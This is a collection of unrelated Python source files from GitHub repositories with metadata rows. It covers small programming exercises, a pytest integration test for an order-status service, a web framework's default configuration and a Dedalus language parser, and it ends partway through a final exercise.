6b10d9a5295db113b96722c8b92c968c83079333 | ef821468b081ef2a0b81bf08596a2c81e1c1ef1a | /Python OOP/Decorators-Exercise/Cache.py | 3630fbd6868ddb28d50316c5fea622d51b440ae5 | [] | no_license | Ivaylo-Atanasov93/The-Learning-Process | 71db22cd79f6d961b9852f140f4285ef7820dd80 | 354844e2c686335345f6a54b3af86b78541ed3f3 | refs/heads/master | 2023-03-30T20:59:34.304207 | 2021-03-29T15:23:05 | 2021-03-29T15:23:05 | 294,181,544 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | def cache(func):
def wrapper(n):
result = func(n)
wrapper.log[n] = result
return result
wrapper.log = {}
return wrapper
@cache
def fibonacci(n):
if n < 2:
return n
else:
return fibonacci(n - 1) + fibonacci(n - 2)
fibonacci(3)
print(fibonacci.log)
fibonacci(4)
print(fibonacci.log)
| [
"[email protected]"
] | |
b8fac3e471ae450389961aa1cb49b4834ce1d6cb | 5b565e331073a8b29f997c30b58d383806f7d5a8 | /pizzeria/11_env/bin/easy_install-3.7 | 242566d7d779997c369a8ea2a01c7db939a5250b | [] | no_license | jeongwook/python_work | f403d5be9da6744e49dd7aedeb666a64047b248d | bba188f47e464060d5c3cd1f245d367da37827ec | refs/heads/master | 2022-04-02T23:16:57.597664 | 2020-01-21T08:29:48 | 2020-01-21T08:29:48 | 227,506,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 288 | 7 | #!/Users/jeongwook/Desktop/python/python_work/pizzeria/11_env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | |
7d75a5e69d0aeff702d6fe53686e32f47cd01b4e | f1614f3531701a29a33d90c31ab9dd6211c60c6b | /test/menu_sun_integration/handlers/test_status_synchronizer_service.py | 207c451856241312424ce76fdbb72a3f98062b7d | [] | no_license | pfpacheco/menu-sun-api | 8a1e11543b65db91d606b2f3098847e3cc5f2092 | 9bf2885f219b8f75d39e26fd61bebcaddcd2528b | refs/heads/master | 2022-12-29T13:59:11.644409 | 2020-10-16T03:41:54 | 2020-10-16T03:41:54 | 304,511,679 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,110 | py | import json
import os
import responses
import pytest
from menu_sun_api.domain.model.customer.customer import Customer
from menu_sun_api.domain.model.order.order import OrderStatusType
from menu_sun_api.domain.model.order.order_repository import OrderRepository
from menu_sun_api.domain.model.seller.seller import IntegrationType
from menu_sun_integration.application.services.order_integration_service import OrderIntegrationService
from promax.application.status_synchronizer_service import StatusSynchronizerService
from test.menu_sun_api.db.order_factory import OrderFactory, OrderStatusFactory
from test.menu_sun_api.db.seller_factory import SellerFactory
from test.menu_sun_api.integration_test import IntegrationTest
here = os.path.dirname(os.path.realpath(__file__))
def bind_seller(integration_type):
return SellerFactory.create(seller_code='0810204', integration_type=integration_type)
class TestStatusNotifierService(IntegrationTest):
@pytest.fixture
def active_responses(self):
json_file = open(
os.path.join(
here,
'../../menu_sun_integration/infrastructure/ambev/promax_response/authenticate_user_response.json'))
response = json.load(json_file)
responses.add(responses.POST, 'https://{}/ambev/security/ldap/authenticateUser'.format(os.getenv("PROMAX_IP")),
json=response, status=200)
return responses
@responses.activate
def test_fetch_order_status_promax(self, session, active_responses):
seller = bind_seller(IntegrationType.PROMAX)
session.commit()
customer = Customer(document="17252508000180", seller_id=seller.id)
statuses = [OrderStatusFactory(status=OrderStatusType.NEW),
OrderStatusFactory(status=OrderStatusType.APPROVED)]
order = OrderFactory.create(seller_id=seller.id, order_id='M2100008658',
customer=customer, statuses=statuses)
session.commit()
json_file = open(
os.path.join(
here,
'../../menu_sun_integration/infrastructure/ambev/promax_response/orders_history_response.json'))
response = json.load(json_file)
active_responses.add(responses.POST,
'https://{}/ambev/genericRestEndpoint'.format(os.getenv("PROMAX_IP")),
json=response, status=200)
order_repository = OrderRepository(session=session)
integration_service = OrderIntegrationService(session=session)
status_notification = StatusSynchronizerService(order_repository=order_repository,
integration_service=integration_service)
status_notification.sync_all_pending_orders(
seller_id=seller.id, seller_code=seller.seller_code, integration_type=seller.integration_type)
session.commit()
order = order_repository.get_order(
seller_id=seller.id, order_id=order.order_id)
assert (order.status.status == OrderStatusType.CANCELED)
| [
"[email protected]"
] | |
faf55dcced2172399d37e25d66e39d89868333d0 | 280049c5d363df840e5a2184002e59625f0af61b | /datastructure11-balancedparanthesischeck.py | 26c752c9dfffff64c23a2cf8d5095ae37812d617 | [] | no_license | deesaw/DataSPython | 853c1b36f7185752613d6038e706b06fbf25c84e | c69a23dff3b3852310f145d1051f2ad1dda6b7b5 | refs/heads/main | 2023-02-19T13:36:01.547293 | 2021-01-16T13:15:56 | 2021-01-16T13:15:56 | 330,166,053 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,346 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Jan 6 12:17:58 2021
@author: deesaw
"""
def balance_check(s):
# Check is even number of brackets
if len(s)%2 != 0:
return False
# Set of opening brackets
opening = set('([{')
# Matching Pairs
matches = set([ ('(',')'), ('[',']'), ('{','}') ])
# Use a list as a "Stack"
stack = []
# Check every parenthesis in string
for paren in s:
# If its an opening, append it to list
if paren in opening:
stack.append(paren)
else:
# Check that there are parentheses in Stack
if len(stack) == 0:
return False
# Check the last open parenthesis
last_open = stack.pop()
# Check if it has a closing match
if (last_open,paren) not in matches:
return False
return len(stack) == 0
from nose.tools import assert_equal
class TestBalanceCheck(object):
def test(self,sol):
assert_equal(sol('[](){([[[]]])}('),False)
assert_equal(sol('[{{{(())}}}]((()))'),True)
assert_equal(sol('[[[]])]'),False)
print('ALL TEST CASES PASSED')
# Run Tests
t = TestBalanceCheck()
t.test(balance_check) | [
"[email protected]"
] | |
adec15e7f10d62c6d1a6c1bca83ce174883b2551 | 69f47a6e77fc2a1363fc8713ed83d36209e7cf32 | /deframed/default.py | 997b289bd34920ff3704dc3d241fa7fbc6f6c50e | [] | no_license | smurfix/deframed | f1c4611c597809b53a138b70665430ed080a989d | 9c1d4db2991cef55725ac6ecae44af60a96ff4f2 | refs/heads/master | 2022-07-20T14:08:35.938667 | 2022-07-14T07:05:43 | 2022-07-14T07:05:43 | 259,882,446 | 24 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,184 | py | """
This module contains the default values for configuring DeFramed.
"""
from .util import attrdict
__all__ = ["CFG"]
CFG = attrdict(
logging=attrdict( # a magic incantation
version=1,
loggers=attrdict(
#"asyncari": {"level":"INFO"},
),
root=attrdict(
handlers= ["stderr",],
level="INFO",
),
handlers=attrdict(
logfile={
"class":"logging.FileHandler",
"filename":"/var/log/deframed.log",
"level":"INFO",
"formatter":"std",
},
stderr={
"class":"logging.StreamHandler",
"level":"INFO",
"formatter":"std",
"stream":"ext://sys.stderr",
},
),
formatters=attrdict(
std={
"class":"deframed.util.TimeOnlyFormatter",
"format":'%(asctime)s %(levelname)s:%(name)s:%(message)s',
},
),
disable_existing_loggers=False,
),
server=attrdict( # used to setup the hypercorn toy server
host="127.0.0.1",
port=8080,
prio=0,
name="test me",
use_reloader=False,
ca_certs=None,
certfile=None,
keyfile=None,
),
mainpage="templates/layout.mustache",
debug=False,
data=attrdict( # passed to main template
title="Test page. Do not test!",
loc=attrdict(
#msgpack="https://github.com/ygoe/msgpack.js/raw/master/msgpack.min.js",
#mustache="https://github.com/janl/mustache.js/raw/master/mustache.min.js",
msgpack="https://unpkg.com/@msgpack/msgpack",
mustache="/static/ext/mustache.min.js",
bootstrap_css="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css",
bootstrap_js="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js",
poppler="https://cdn.jsdelivr.net/npm/[email protected]/dist/umd/popper.min.js",
jquery="https://code.jquery.com/jquery-3.4.1.slim.min.js",
),
static="static", # path
),
)
| [
"[email protected]"
] | |
e2165c7579217230237b68c6b491e3e20486e06b | c4ea97ae471cd222378684b8dc6be1047836dc85 | /src/dedt/dedalusParser.py | 9ba5de3d8b1778559ec87925a329aaff254cb7aa | [
"MIT"
] | permissive | KDahlgren/iapyx | b3de26da34ffd7dcc255afd9b70fe58de543711b | 260a265f79cd66bf4ea72b0a4837517d460dc257 | refs/heads/master | 2018-10-01T06:45:15.986558 | 2018-06-22T01:38:22 | 2018-06-22T01:38:22 | 109,737,208 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 26,697 | py | #!/usr/bin/env python
'''
dedalusParser.py
Define the functionality for parsing Dedalus files.
'''
import inspect, logging, os, re, string, sys, traceback
from pyparsing import *
import ConfigParser
# ------------------------------------------------------ #
# import sibling packages HERE!!!
if not os.path.abspath( __file__ + "/../.." ) in sys.path :
sys.path.append( os.path.abspath( __file__ + "/../.." ) )
from utils import tools
# ------------------------------------------------------ #
#############
# GLOBALS #
#############
eqnOps = [ "==", "!=", ">=", "<=", ">", "<" ]
opList = eqnOps + [ "+", "-", "/", "*" ]
aggOps = [ "min", "max", "sum", "count", "avg" ]
##################
# CLEAN RESULT #
##################
# input pyparse object of the form ([...], {...})
# output only [...]
def cleanResult( result ) :
newResult = []
numParsedStrings = len(result)
for i in range(0, numParsedStrings) :
newResult.append( result[i] )
return newResult
###########
# PARSE #
###########
# input a ded line
# output parsed line
# fact returns : [ 'fact', { relationName:'relationNameStr', dataList:[ data1, ... , dataN ], factTimeArg:<anInteger> } ]
# rule returns : [ 'rule',
# { relationName : 'relationNameStr',
# goalAttList:[ data1, ... , dataN ],
# goalTimeArg : ""/next/async,
# subgoalListOfDicts : [ { subgoalName : 'subgoalNameStr',
# subgoalAttList : [ data1, ... , dataN ],
# polarity : 'notin' OR '',
# subgoalTimeArg : <anInteger> }, ... ],
# eqnDict : { 'eqn1':{ variableList : [ 'var1', ... , 'varI' ] },
# ... ,
# 'eqnM':{ variableList : [ 'var1', ... , 'varJ' ] } } } ]
def parse( dedLine, settings_path ) :
logging.debug( " PARSE : dedLine = '" + dedLine + "'" )
# ---------------------------------------------------- #
# CASE : line is empty
if dedLine == "" :
return None
# ---------------------------------------------------- #
# CASE : line missing semicolon
elif not ";" in dedLine :
sys.exit( " PARSE : ERROR : missing semicolon in line '" + dedLine + "'" )
# ---------------------------------------------------- #
# CASE : line is an include
elif dedLine.startswith( 'include"' ) or dedLine.startswith( "include'" ) :
pass
# ---------------------------------------------------- #
# CASE : line is a FACT
elif not ":-" in dedLine :
if not sanityCheckSyntax_fact_preChecks( dedLine ) :
sys.exit( " PARSE : ERROR : invalid syntax in fact '" + dedLine + "'" )
factData = {}
# ///////////////////////////////// #
# get relation name
relationName = dedLine.split( "(", 1 )[0]
# ///////////////////////////////// #
# get data list
dataList = dedLine.split( "(", 1 )[1] # string
dataList = dataList.split( ")", 1 )[0] # string
dataList = dataList.split( "," )
# ///////////////////////////////// #
# get time arg
ampersandIndex = dedLine.index( "@" )
factTimeArg = dedLine[ ampersandIndex + 1 : ]
factTimeArg = factTimeArg.replace( ";", "" ) # remove semicolons
# ///////////////////////////////// #
# save fact information
factData[ "relationName" ] = relationName
factData[ "dataList" ] = dataList
factData[ "factTimeArg" ] = factTimeArg
if not sanityCheckSyntax_fact_postChecks( dedLine, factData ) :
sys.exit( " PARSE : ERROR : invalid syntax in fact '" + dedLine + "'" )
logging.debug( " PARSE : returning " + str( [ "fact", factData ] ) )
return [ "fact", factData ]
# ---------------------------------------------------- #
# CASE : line is a RULE
#
# rule returns : [ 'rule',
# { relationName : 'relationNameStr',
# goalAttList:[ data1, ... , dataN ],
# goalTimeArg : ""/next/async,
# subgoalListOfDicts : [ { subgoalName : 'subgoalNameStr',
# subgoalAttList : [ data1, ... , dataN ],
# polarity : 'notin' OR '',
# subgoalTimeArg : <anInteger> }, ... ],
# eqnDict : { 'eqn1':{ variableList : [ 'var1', ... , 'varI' ] },
# ... ,
# 'eqnM':{ variableList : [ 'var1', ... , 'varJ' ] } } } ]
elif ":-" in dedLine :
if not sanityCheckSyntax_rule_preChecks( dedLine ) :
sys.exit( " PARSE : ERROR : invalid syntax in fact '" + dedLine + "'" )
ruleData = {}
# ///////////////////////////////// #
# get relation name
relationName = dedLine.split( "(", 1 )[0]
ruleData[ "relationName" ] = relationName
# ///////////////////////////////// #
# get goal attribute list
goalAttList = dedLine.split( "(", 1 )[1] # string
goalAttList = goalAttList.split( ")", 1 )[0] # string
goalAttList = goalAttList.split( "," )
ruleData[ "goalAttList" ] = goalAttList
# ///////////////////////////////// #
# get goal time argument
goalTimeArg = dedLine.split( ":-", 1 )[0] # string
try :
goalTimeArg = goalTimeArg.split( "@", 1 )[1] # string
except IndexError :
goalTimeArg = ""
ruleData[ "goalTimeArg" ] = goalTimeArg
# ///////////////////////////////// #
# parse the rule body for the eqn list
eqnDict = getEqnDict( dedLine )
ruleData[ "eqnDict" ] = eqnDict
# ///////////////////////////////// #
# parse the rule body for the eqn list
subgoalListOfDicts = getSubgoalList( dedLine, eqnDict )
ruleData[ "subgoalListOfDicts" ] = subgoalListOfDicts
logging.debug( " PARSE : relationName = " + str( relationName ) )
logging.debug( " PARSE : goalAttList = " + str( goalAttList ) )
logging.debug( " PARSE : goalTimeArg = " + str( goalTimeArg ) )
logging.debug( " PARSE : subgoalListOfDicts = " + str( subgoalListOfDicts ) )
logging.debug( " PARSE : eqnDict = " + str( eqnDict ) )
if not sanityCheckSyntax_rule_postChecks( dedLine, ruleData, settings_path ) :
sys.exit( " PARSE : ERROR : invalid syntax in fact '" + dedLine + "'" )
logging.debug( " PARSE : returning " + str( [ "rule", ruleData ] ) )
return [ "rule", ruleData ]
# ---------------------------------------------------- #
# CASE : wtf???
else :
sys.exit( " PARSE : ERROR : this line is not an empty, a fact, or a rule : '" + dedLine + "'. aborting..." )
##########################
# CONTAINS NO SUBGOALS #
##########################
# make cursory checks to determine if the input rule line contains subgoals
def containsNoSubgoals( dedLine ) :
body = getBody( dedLine )
# ------------------------------------- #
# CASE : no open parenthesis to demark
# attribute list start
if "(" in body :
return False
# ------------------------------------- #
# CASE : no closed parenthesis to demark
# attribute list end
elif ")" in body :
return False
# ------------------------------------- #
# CASE : no commas to delimit subgoals
elif "," in body :
return False
# ------------------------------------- #
# otherwise, probably incorrect
else :
return True
#############
# HAS AGG #
#############
# check if the input attribute contains one
# of the supported aggregate operations.
def hasAgg( attStr ) :
flag = False
for agg in aggOps :
if agg+"<" in attStr :
flag = True
return flag
##################
# IS FIXED STR #
##################
# check if the input attribute is a string,
# as indicated by single or double quotes
def isFixedStr( att ) :
if att.startswith( "'" ) and att.startswith( "'" ) :
return True
elif att.startswith( '"' ) and att.startswith( '"' ) :
return True
else :
return False
##################
# IS FIXED INT #
##################
# check if input attribute is an integer
def isFixedInt( att ) :
if att.isdigit() :
return True
else :
return False
###########################################
# CHECK MIN ONE POS SUBGOAL NO TIME ARG #
###########################################
# make sure at least one positive subgoal
# has no numeric time argument
def check_min_one_pos_subgoal_no_time_arg( ruleLine, ruleData ) :
if not hasPosSubgoalWithoutIntegerTimeArg( ruleData ) :
raise Exception( " SANITY CHECK SYNTAX RULE POST CHECKS : ERROR : " + \
" invalid syntax in line \n'" + ruleLine + \
"'\n line at least one positive subgoal " + \
"must not be annotated with a numeric time argument." )
################################
# CHECK IDENTICAL FIRST ATTS #
################################
# make sure all subgoals
# have identical first attributes
def check_identical_first_atts( ruleLine, ruleData ) :
subgoalListOfDicts = ruleData[ "subgoalListOfDicts" ]
firstAtts = []
for sub in subgoalListOfDicts :
subgoalAttList = sub[ "subgoalAttList" ]
firstAtts.append( subgoalAttList[0] )
firstAtts = set( firstAtts )
if not len( firstAtts ) < 2 :
raise Exception( " SANITY CHECK SYNTAX RULE : ERROR : " + \
"invalid syntax in line \n'" + ruleLine + \
"'\n all subgoals in next and async " + \
"rules must have identical first attributes.\n" )
##########################################
# SANITY CHECK SYNTAX RULE POST CHECKS #
##########################################
# make sure contents of rule make sense.
def sanityCheckSyntax_rule_postChecks( ruleLine, ruleData, settings_path ) :
# ------------------------------------------ #
# make sure all subgoals in next and async
# rules have identical first attributes
try :
use_hacks = tools.getConfig( settings_path, "DEFAULT", "USE_HACKS", bool )
if use_hacks :
if ruleData[ "goalTimeArg" ] == "next" :
check_identical_first_atts( ruleLine, ruleData )
else :
check_min_one_pos_subgoal_no_time_arg( ruleData )
if ruleData[ "goalTimeArg" ] == "next" or ruleData[ "goalTimeArg" ] == "async" :
check_identical_first_atts( ruleLine, ruleData )
except ConfigParser.NoOptionError :
logging.warning( "WARNING : no 'USE_HACKS' defined in 'DEFAULT' section of settings.ini ...running without wildcard rewrites." )
check_min_one_pos_subgoal_no_time_arg( ruleLine, ruleData )
if ruleData[ "goalTimeArg" ] == "next" or ruleData[ "goalTimeArg" ] == "async" :
check_identical_first_atts( ruleLine, ruleData )
# ------------------------------------------ #
# make sure all goal and subgoal attribute
# variables start with a captial letter
goalAttList = ruleData[ "goalAttList" ]
for att in goalAttList :
if not att[0].isalpha() or not att[0].isupper() :
if not hasAgg( att ) : # att is not an aggregate call
if not isFixedStr( att ) : # att is not a fixed data input
if not isFixedInt( att ) : # att is not a fixed data input
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n the goal contains contains an attribute not starting with a capitalized letter: '" + att + "'. \n attribute variables must start with an upper case letter." )
subgoalListOfDicts = ruleData[ "subgoalListOfDicts" ]
for sub in subgoalListOfDicts :
subgoalAttList = sub[ "subgoalAttList" ]
for att in subgoalAttList :
if not att[0].isalpha() or not att[0].isupper() :
if not hasAgg( att ) : # att is not an aggregate call
if not isFixedStr( att ) : # att is not a fixed data input
if not isFixedInt( att ) : # att is not a fixed data input
# subgoals can have wildcards
if not att[0] == "_" :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n subgoal '" + sub[ "subgoalName" ] + "' contains an attribute not starting with a capitalized letter: '" + att + "'. \n attribute variables must start with an upper case letter." )
# ------------------------------------------ #
# make sure all relation names are
# lower case
goalName = ruleData[ "relationName" ]
for c in goalName :
if c.isalpha() and not c.islower() :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n The goal name '" + goalName + "' contains an upper-case letter. \n relation names must contain only lower-case characters." )
subgoalListOfDicts = ruleData[ "subgoalListOfDicts" ]
for sub in subgoalListOfDicts :
subName = sub[ "subgoalName" ]
for c in subName :
if c.isalpha() and not c.islower() :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n The subgoal name '" + subName + "' contains an upper-case letter. \n relation names must contain only lower-case characters." )
return True
##############################################
# HAS POS SUBGOAL WITHOUT INTEGER TIME ARG #
##############################################
# check make sure the line contains at least
# one positive subgoal NOT annotated with an
# integer time argument
def hasPosSubgoalWithoutIntegerTimeArg( ruleData ) :
goalTimeArg = ruleData[ "goalTimeArg" ]
subgoalListOfDicts = ruleData[ "subgoalListOfDicts" ]
# ------------------------------------------ #
# CASE : rule is either next or async
# the clock goal is always initially positive
if not goalTimeArg == "" :
return True
# ------------------------------------------ #
# CASE : rule is deductive
# need to check more closely for deductive rules
else :
for subgoal in subgoalListOfDicts :
if subgoal[ "polarity"] == "" : # positive
if not subgoal[ "subgoalTimeArg" ].isdigit() :
return True
return False
#########################################
# SANITY CHECK SYNTAX RULE PRE CHECKS #
#########################################
# make an initial pass on the rule syntax
def sanityCheckSyntax_rule_preChecks( ruleLine ) :
# make sure the line likely has subgoal(s)
if containsNoSubgoals( ruleLine ) :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n rule contains no detected subgoals." )
# make sure parentheses make sense
if not ruleLine.count( "(" ) == ruleLine.count( ")" ) :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n rule contains inconsistent counts for '(' and ')'" )
# make sure number of single is even
if not ruleLine.count( "'" ) % 2 == 0 :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n rule contains inconsistent use of single quotes." )
# make sure number of double quotes is even
if not ruleLine.count( '"' ) % 2 == 0 :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n rule contains inconsistent use of single quotes." )
return True
##################
# GET EQN DICT #
##################
# get the complete dictionary of equations in the given rule line
def getEqnDict( dedLine ) :
eqnDict = {}
body = getBody( dedLine )
body = body.split( "," )
# get the complete list of eqns from the rule body
eqnList = []
for thing in body :
if isEqn( thing ) :
eqnList.append( thing )
# get the complete list of variables per eqn
for eqn in eqnList :
varList = getEqnVarList( eqn )
eqnDict[ eqn ] = varList
return eqnDict
######################
# GET EQN VAR LIST #
######################
def getEqnVarList( eqnString ) :
for op in opList :
eqnString = eqnString.replace( op, "___COMMA___" )
varList = eqnString.split( "___COMMA___" )
return varList
######################
# GET SUBGOAL LIST #
######################
# get the complete list of subgoals in the given rule line
# subgoalListOfDicts : [ { subgoalName : 'subgoalNameStr',
# subgoalAttList : [ data1, ... , dataN ],
# polarity : 'notin' OR '',
# subgoalTimeArg : <anInteger> }, ... ]
def getSubgoalList( dedLine, eqnList ) :
subgoalListOfDicts = []
# ========================================= #
# replace eqn instances in line
for eqn in eqnList :
dedLine = dedLine.replace( eqn, "" )
dedLine = dedLine.replace( ",,", "," )
# ========================================= #
# grab subgoals
# grab indexes of commas separating subgoals
indexList = getCommaIndexes( getBody( dedLine ) )
#print indexList
# replace all subgoal-separating commas with a special character sequence
body = getBody( dedLine )
tmp_body = ""
for i in range( 0, len( body ) ) :
if not i in indexList :
tmp_body += body[i]
else :
tmp_body += "___SPLIT___HERE___"
body = tmp_body
#print body
# generate list of separated subgoals by splitting on the special
# character sequence
subgoals = body.split( "___SPLIT___HERE___" )
# remove empties
tmp_subgoals = []
for sub in subgoals :
if not sub == "" :
tmp_subgoals.append( sub )
subgoals = tmp_subgoals
# ========================================= #
# parse all subgoals in the list
for sub in subgoals :
#print sub
currSubData = {}
if not sub == "" :
# get subgoalTimeArg
try :
ampersandIndex = sub.index( "@" )
subgoalTimeArg = sub[ ampersandIndex + 1 : ]
sub = sub.replace( "@" + subgoalTimeArg, "" ) # remove the time arg from the subgoal
except ValueError :
subgoalTimeArg = ""
# get subgoal name and polarity
data = sub.replace( ")", "" )
data = data.split( "(" )
subgoalName = data[0]
subgoalName = subgoalName.replace( ",", "" ) # remove any rogue commas
if " notin " in subgoalName :
polarity = "notin"
subgoalName = subgoalName.replace( " notin ", "" )
else :
polarity = ""
# get subgoal att list
subgoalAttList = data[1]
subgoalAttList = subgoalAttList.split( "," )
# collect subgoal data
currSubData[ "subgoalName" ] = subgoalName
currSubData[ "subgoalAttList" ] = subgoalAttList
currSubData[ "polarity" ] = polarity
currSubData[ "subgoalTimeArg" ] = subgoalTimeArg
# save data for this subgoal
subgoalListOfDicts.append( currSubData )
#print subgoalListOfDict
#sys.exit( "foo" )
return subgoalListOfDicts
#######################
# GET COMMA INDEXES #
#######################
# given a rule body, get the indexes of commas separating subgoals.
def getCommaIndexes( body ) :
underscoreStr = getCommaIndexes_helper( body )
indexList = []
for i in range( 0, len( underscoreStr ) ) :
if underscoreStr[i] == "," :
indexList.append( i )
return indexList
##############################
# GET COMMA INDEXES HELPER #
##############################
# replace all paren contents with underscores
def getCommaIndexes_helper( body ) :
# get the first occuring paren group
nextParenGroup = "(" + re.search(r'\((.*?)\)',body).group(1) + ")"
# replace the group with the same number of underscores in the body
replacementStr = ""
for i in range( 0, len(nextParenGroup)-2 ) :
replacementStr += "_"
replacementStr = "_" + replacementStr + "_" # use underscores to replace parentheses
body = body.replace( nextParenGroup, replacementStr )
# BASE CASE : no more parentheses
if not "(" in body :
return body
# RECURSIVE CASE : yes more parentheses
else :
return getCommaIndexes_helper( body )
############
# IS EQN #
############
# check if input contents from the rule body is an equation
def isEqn( sub ) :
flag = False
for op in eqnOps :
if op in sub :
flag = True
return flag
##############
# GET BODY #
##############
# return the body str from the input rule
def getBody( query ) :
body = query.replace( "notin", "___NOTIN___" )
body = body.replace( ";", "" )
body = body.translate( None, string.whitespace )
body = body.split( ":-" )
body = body[1]
body = body.replace( "___NOTIN___", " notin " )
return body
##############################
# SANITY CHECK SYNTAX FACT #
##############################
# check fact lines for invalud syntax.
# abort if invalid syntax found.
# return True otherwise.
def sanityCheckSyntax_fact_preChecks( factLine ) :
logging.debug( " SANITY CHECK SYNTAX FACT : running process..." )
logging.debug( " SANITY CHECK SYNTAX FACT : factLine = " + str( factLine ) )
# ------------------------------------------ #
# facts must have time args.
if not "@" in factLine :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in line '" + factLine + "'\n line does not contain a time argument.\n" )
# ------------------------------------------ #
# check parentheses
if not factLine.count( "(" ) < 2 :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in line '" + factLine + "'\n line contains more than one '('\n" )
elif not factLine.count( "(" ) > 0 :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in line '" + factLine + "'\n line contains fewer than one '('\n" )
if not factLine.count( ")" ) < 2 :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in line '" + factLine + "'\n line contains more than one ')'\n" )
elif not factLine.count( ")" ) > 0 :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in line '" + factLine + "'\n line contains fewer than one ')'\n" )
return True
##########################################
# SANITY CHECK SYNTAX FACT POST CHECKS #
##########################################
# check fact lines for invalud syntax.
# abort if invalid syntax found.
# return True otherwise.
def sanityCheckSyntax_fact_postChecks( factLine, factData ) :
logging.debug( " SANITY CHECK SYNTAX FACT : running process..." )
logging.debug( " SANITY CHECK SYNTAX FACT : factData = " + str( factData ) )
# ------------------------------------------ #
# check quotes on input string data
dataList = factData[ "dataList" ]
for data in dataList :
logging.debug( " SANITY CHECK SYNTAX FACT : data = " + str( data ) + ", type( data ) = " + str( type( data) ) + "\n" )
if isString( data ) :
# check quotes
if not data.count( "'" ) == 2 and not data.count( '"' ) == 2 :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in fact '" + \
str( factLine ) + "'\n fact definition contains string data not " + \
"surrounded by either exactly two single quotes or exactly two double quotes : " + data + "\n" )
else :
pass
# ------------------------------------------ #
# check time arg
factTimeArg = factData[ "factTimeArg" ]
print "factTimeArg = " + str( factTimeArg )
if not factTimeArg.isdigit() and \
not factTimeArg == "constant" :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid " + \
"syntax in fact data list '" + str( factLine ) + \
"'\n fact definition has no valid time arg." )
return True
###############
# IS STRING #
###############
# test if the input string contains any alphabetic characters.
# if so, then the data is a string.
def isString( testString ) :
logging.debug( " IS STRING : testString = " + str( testString ) )
alphabet = [ 'a', 'b', 'c', \
'd', 'e', 'f', \
'g', 'h', 'i', \
'j', 'k', 'l', \
'm', 'n', 'o', \
'p', 'q', 'r', \
's', 't', 'u', \
'v', 'w', 'x', \
'y', 'z' ]
flag = False
for character in testString :
if character.lower() in alphabet :
flag = True
logging.debug( " IS STRING : flag = " + str( flag ) )
return flag
###################
# PARSE DEDALUS #
###################
# input name of raw dedalus file
# output array of arrays containing the contents of parsed ded lines
def parseDedalus( dedFile, settings_path ) :
logging.debug( " PARSE DEDALUS : dedFile = " + dedFile )
parsedLines = []
# ------------------------------------------------------------- #
# remove all multiline whitespace and place all rules
# on individual lines
lineList = sanitizeFile( dedFile )
# ------------------------------------------------------------- #
# iterate over each line and parse
for line in lineList :
result = parse( line, settings_path ) # parse returns None on empty lines
if result :
parsedLines.append( result )
logging.debug( " PARSE DEDALUS : parsedLines = " + str( parsedLines ) )
return parsedLines
# ------------------------------------------------------------- #
###################
# SANITIZE FILE #
###################
# input all lines from input file
# combine all lines into a single huge string.
# to preserve syntax :
# replace semicolons with string ';___NEWLINE___'
# replace all notins with '___notin___'
# split on '___NEWLINE__'
def sanitizeFile( dedFile ) :
bigLine = ""
# "always check if files exist" -- Ye Olde SE proverb
if os.path.isfile( dedFile ) :
f = open( dedFile, "r" )
# combine all lines into one big line
for line in f :
#print "old_line = " +str( line )
line = line.replace( "//", "___THISISACOMMENT___" )
line = line.split( "___THISISACOMMENT___", 1 )[0]
#print "new_line = " +str( line )
line = line.replace( "notin", "___notin___" ) # preserve notins
line = line.replace( ";", ";___NEWLINE___" ) # preserve semicolons
line = line.translate( None, string.whitespace ) # remove all whitespace
bigLine += line
f.close()
bigLine = bigLine.replace( "___notin___", " notin " ) # restore notins
lineList = bigLine.split( "___NEWLINE___" ) # split big line into a list of lines
# remove duplicates
final_lineList = []
for line in lineList :
if not line in final_lineList :
final_lineList.append( line )
return final_lineList
else :
sys.exit( "ERROR: File at " + dedFile + " does not exist.\nAborting..." )
#########
# EOF #
#########
| [
"[email protected]"
] | |
f794cd1dae5cb4ed8da0fc22286c5a047b86c2fa | d8a541a2953c9729311059585bb0fca9003bd6ef | /Lists as stack ques/cups_and_bottles.py | efc8af013cd606d663a6539b7b98d2807e6c28fc | [] | no_license | grigor-stoyanov/PythonAdvanced | ef7d628d2b81ff683ed8dd47ee307c41b2276dd4 | 0a6bccc7faf1acaa01979d1e23cfee8ec29745b2 | refs/heads/main | 2023-06-10T09:58:04.790197 | 2021-07-03T02:52:20 | 2021-07-03T02:52:20 | 332,509,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 604 | py | from collections import deque
cups = deque(map(int, input().split()))
bottles = list(map(int, input().split()))
wasted_water = 0
while cups and bottles:
